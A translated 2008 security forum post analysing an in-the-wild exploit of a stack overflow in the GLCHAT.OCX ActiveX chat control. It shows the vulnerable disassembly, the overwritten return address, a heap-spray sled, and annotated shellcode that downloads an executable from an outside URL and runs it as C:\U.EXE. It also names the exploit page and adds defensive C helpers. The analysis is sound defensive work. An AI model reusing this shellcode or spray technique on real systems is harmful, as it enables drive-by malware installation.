A few days ago, while browsing a website, something felt off; on inspection I found that several programs had been downloaded and executed on my system.
Analyzing that site showed that it exploits the chatroom vulnerability in the Lianzhong (ourgame) ActiveX control named glchat.ocx; the latest update, from January 19, still has this hole.
The URL I was browsing at the time was: hxxp://www.80diy.com/home/20050812/08/4204306.html
If you like playing with vulnerabilities, you can trace it from that URL and find the relevant web page code.
Stack data pointed to by ESP when execution reaches 029A1DC0:
0012C9AC 73D47F2C 0020E0DC 73D47AC6 73D47A6C ,.s.. ..z.slz.s
Below is the chatroom code:
029A1DC0 SUB ESP,00000100----->buffer holds at most 256 bytes; anything longer overflows.
029A1DC6 PUSH EBX
029A1DC7 PUSH EBP
029A1DC8 MOV EBP,ECX
029A1DCA PUSH ESI
029A1DCB MOV ESI,[ESP+00000110]
029A1DD2 MOV EAX,[EBP+00001080]
029A1DD8 LEA EBX,[EBP+00001080]
029A1DDE MOV DL,[EAX]
029A1DE0 MOV CL,DL
029A1DE2 CMP DL,[ESI]
029A1DE4 JNZ 029A1E02
029A1DE6 TEST CL,CL
029A1DE8 JZ 029A1DFE
029A1DEA MOV DL,[EAX+01]
029A1DED MOV CL,DL
029A1DEF CMP DL,[ESI+01]
029A1DF2 JNZ 029A1E02
029A1DF4 ADD EAX,02
029A1DF7 ADD ESI,02
029A1DFA TEST CL,CL
029A1DFC JNZ 029A1DDE
029A1DFE XOR EAX,EAX
029A1E00 JMP 029A1E07
029A1E02 SBB EAX,EAX
029A1E04 SBB EAX,-01
029A1E07 TEST EAX,EAX
029A1E09 JZ 029A1E7E
029A1E0B PUSH EDI
029A1E0C MOV EDI,[ESP+00000114]
029A1E13 OR ECX,-01
029A1E16 XOR EAX,EAX ------->compute the length of the argument.
029A1E18 REPNZ SCASB
029A1E1A NOT ECX
029A1E1C SUB EDI,ECX
029A1E1E LEA EDX,[ESP+10]
029A1E22 MOV EAX,ECX
029A1E24 MOV ESI,EDI
029A1E26 MOV EDI,EDX
029A1E28 SHR ECX,02
029A1E2B REPZ MOVSD --------->where the overflow occurs
029A1E2D MOV ECX,EAX
029A1E2F AND ECX,03
029A1E32 REPZ MOVSB
029A1E34 MOV AL,[ESP+10]
029A1E38 POP EDI
029A1E39 CMP AL,67
029A1E3B JZ 029A1E41
029A1E3D CMP AL,47
029A1E3F JNZ 029A1E66
029A1E41 MOV AL,[ESP+0D]
029A1E45 TEST AL,AL
029A1E47 JZ 029A1E52
029A1E49 CMP AL,20
029A1E4B JNZ 029A1E49
029A1E4D MOV BYTE PTR [ESP+0D],00
029A1E52 LEA ECX,[ESP+0D]
029A1E56 PUSH ECX
029A1E57 CALL [029DFCBC]
029A1E5D ADD ESP,04
029A1E60 MOV [EBP+000011E4],EAX
029A1E66 MOV EDX,[ESP+00000110]
029A1E6D MOV ECX,EBX
029A1E6F PUSH EDX
029A1E70 CALL 029C8834
029A1E75 PUSH 01
029A1E77 MOV ECX,EBP
029A1E79 CALL 029C8822
029A1E7E POP ESI
029A1E7F POP EBP
029A1E80 POP EBX
029A1E81 ADD ESP,00000100
029A1E87 RET 0004
When execution reaches 029A1E87, the data at ESP has been replaced by the overflow contents shown below; after the return, EIP will execute the code at 0A0A0A0A.
0012C9AC 0A0A0A0A 0A0A0A0A 0A0A0A0A 0A0A0A0A ................
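To make the frame arithmetic explicit, here is an added C model (not code from the post or from glchat.ocx) of the copy above: it predicts the effect of a given argument length on the saved return address and shows the bounds check the original lacks. The frame size and buffer offset come from the disassembly; the function names are my assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Constructed C model of the frame recovered from the chatroom disassembly
 * (not the control's source): SUB ESP,0x100 reserves the frame, and the copy
 * target LEA EDX,[ESP+10] is taken after PUSH EBX/EBP/ESI plus PUSH EDI,
 * which puts the buffer exactly 0x100 bytes below the saved return address.
 * The copy length comes from the argument itself (REPNZ SCASB / NOT ECX gives
 * strlen+1) and is never compared with the frame size; that is the bug. */
#define CHAT_FRAME 0x100u   /* bytes from buffer start to the saved EIP */

typedef enum { COPY_FITS, COPY_PARTIAL_RET, COPY_SMASHES_RET } copy_effect;

/* Predicts what the original REP MOVSD/MOVSB sequence does for a given
 * argument length, without performing the unsafe copy. */
copy_effect classify_copy(size_t arg_len)
{
    size_t copied = arg_len + 1;                          /* includes the NUL */
    if (copied <= CHAT_FRAME) return COPY_FITS;
    if (copied < CHAT_FRAME + 4) return COPY_PARTIAL_RET; /* low bytes of EIP hit */
    return COPY_SMASHES_RET;                              /* all four EIP bytes replaced */
}

/* Hardened handler: the length check the original lacks. Returns 0 when the
 * argument (with its NUL) fits in dst, -1 when it is rejected. */
int chatroom_copy_safe(char *dst, size_t dst_size, const char *arg)
{
    const char *nul = memchr(arg, '\0', dst_size);  /* scan no further than dst_size */
    if (nul == NULL) return -1;                     /* no terminator inside the bound */
    memcpy(dst, arg, (size_t)(nul - arg) + 1);
    return 0;
}
```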
Below is what was displayed at 0A0A0A0A; the attacker fills memory by brute force (a heap spray). The real shellcode is in the disassembly further below.
:db a0a0a0a l20
0A0A0A0A 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0A0A1A 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0AFEFA 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0AFF0A 90 90 90 90 90 90 90 90-90 90 90 90 EB 54 8B 75 .............T.u
0A0AFF1A 3C 8B 74 35 78 03 F5 56-8B 76 20 03 F5 33 C9 49 <.t5x..V.v ..3.I
From here on is the shellcode. It downloads a program, saves it as C:\U.EXE and runs it.
0A0AFF16 JMP 0A0AFF6C (JUMP )
0A0AFF18 MOV ESI,[EBP+3C]
0A0AFF1B MOV ESI,[ESI+EBP+78]
0A0AFF1F ADD ESI,EBP
0A0AFF21 PUSH ESI
0A0AFF22 MOV ESI,[ESI+20]
0A0AFF25 ADD ESI,EBP
0A0AFF27 XOR ECX,ECX
0A0AFF29 DEC ECX
0A0AFF2A INC ECX
0A0AFF2B LODSD
0A0AFF2C XOR EBX,EBX
0A0AFF2E MOVSX EDX,BYTE PTR SS:[EBP+EAX]
0A0AFF33 CMP DL,DH
0A0AFF35 JZ 0A0AFF3F
0A0AFF37 ROR EBX,0D
0A0AFF3A ADD EBX,EDX
0A0AFF3C INC EAX
0A0AFF3D JMP 0A0AFF2E
0A0AFF3F CMP EBX,EDI
0A0AFF41 JNZ 0A0AFF2A
0A0AFF43 POP ESI
0A0AFF44 MOV EBX,[ESI+24]
0A0AFF47 ADD EBX,EBP
0A0AFF49 MOV CX,[ECX*2+EBX]
0A0AFF4D MOV EBX,[ESI+1C]
0A0AFF50 ADD EBX,EBP
0A0AFF52 MOV EAX,[ECX*4+EBX]
0A0AFF55 ADD EAX,EBP
0A0AFF57 RET
:d a0aff58 l100
0A0AFF58 75 72 6C 6D 6F 6E 2E 64-6C 6C 00 43 3A 5C 55 2E urlmon.dll.C:\U.---the file name it saves to
0A0AFF68 65 78 65 00 33 C0 64 03-40 30 78 0C 8B 40 0C 8B exe.3.d.@0x..@..
0A0AFF6C XOR EAX,EAX
0A0AFF6E ADD EAX,FS:[EAX+30]
0A0AFF72 JS 0A0AFF80
0A0AFF74 MOV EAX,[EAX+0C]
0A0AFF77 MOV ESI,[EAX+1C]
0A0AFF7A LODSD
0A0AFF7B MOV EAX,[EAX+08]
0A0AFF7E JMP 0A0AFF89
0A0AFF80 MOV EAX,[EAX+34]
0A0AFF83 LEA EAX,[EAX+7C]
0A0AFF86 MOV EAX,[EAX+3C]
0A0AFF89 XCHG EAX,EBP
0A0AFF8A MOV EDI,EC0E4E8E
0A0AFF8F CALL 0A0AFF18------------>LoadLibraryA
0A0AFF94 SUB ESP,04
0A0AFF97 SUB DWORD PTR [ESP],3C
0A0AFF9B CALL EAX
0A0AFF9D XCHG EAX,EBP
0A0AFF9E PUSH EAX
0A0AFF9F MOV EDI,702F1A36
0A0AFFA4 CALL 0A0AFF18
0A0AFFA9 MOV EDX,[ESP-04]
0A0AFFAD LEA EDX,[EDX-46]
0A0AFFB0 XOR EBX,EBX
0A0AFFB2 PUSH EBX
0A0AFFB3 PUSH EBX
0A0AFFB4 PUSH EDX
0A0AFFB5 JMP 0A0AFFDB
0A0AFFB7 PUSH EBX
0A0AFFB8 CALL EAX------------>URLDownloadToFileA
0A0AFFBA POP EBP
0A0AFFBB MOV EDI,0E8AFE98
0A0AFFC0 CALL 0A0AFF18------------>WinExec
0A0AFFC5 SUB ESP,04
0A0AFFC8 SUB DWORD PTR [ESP],62
0A0AFFCC CALL EAX
0A0AFFCE MOV EDI,73E2D87E
0A0AFFD3 CALL 0A0AFF18---------->ExitProcess
0A0AFFD8 PUSH EDX
0A0AFFD9 CALL EAX
0A0AFFDB CALL 0A0AFFB7
:d a0affe0 l100
0A0AFFE0 68 74 74 70 3A 2F 2F 77-77 77 2E 65 68 65 68 30 http://www.eheh0--->the download URL is here
0A0AFFF0 30 31 2E 63 6E 2F 61 61-2E 65 78 65 00 00 00 00 01.cn/aa.exe....
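To confirm the API annotations on the CALL 0A0AFF18 sites above, here is an added C helper (not from the post or the shellcode) that re-implements the hash loop at 0A0AFF2E..0A0AFF3D and matches the four EDI constants against a constructed list of export names; the candidate list and function names are my assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed analyst helper. The loop at 0A0AFF2E..0A0AFF3D computes, for
 * each byte of an export name up to the NUL: EBX = ROR(EBX,13) + byte. */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32 - n));
}

uint32_t ror13_hash(const char *name)
{
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++)
        h = ror32(h, 13) + *p;   /* MOVSX of an ASCII byte is just the byte */
    return h;
}

/* Constructed candidate list; extend it when triaging other samples. */
static const char *const candidates[] = {
    "LoadLibraryA", "GetProcAddress", "WinExec", "ExitProcess",
    "URLDownloadToFileA", "CreateProcessA", "VirtualAlloc",
};

/* Returns the export name whose hash equals h, or NULL if none matches. */
const char *resolve_hash(uint32_t h)
{
    for (size_t i = 0; i < sizeof candidates / sizeof candidates[0]; i++)
        if (ror13_hash(candidates[i]) == h)
            return candidates[i];
    return NULL;
}

int main(void)
{
    /* The four constants loaded into EDI in the listing above. */
    const uint32_t seen[] = { 0xEC0E4E8E, 0x702F1A36, 0x0E8AFE98, 0x73E2D87E };
    for (size_t i = 0; i < sizeof seen / sizeof seen[0]; i++) {
        const char *n = resolve_hash(seen[i]);
        printf("%08X -> %s\n", seen[i], n ? n : "(unknown)");
    }
    return 0;
}
```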
- Title: Analysis of the chatroom vulnerability in the Lianzhong plugin GLCHAT.OCX
- Author: softdebug
- Date: 2008-01-23 23:18
- Link: http://bbs.pediy.com/showthread.php?t=58815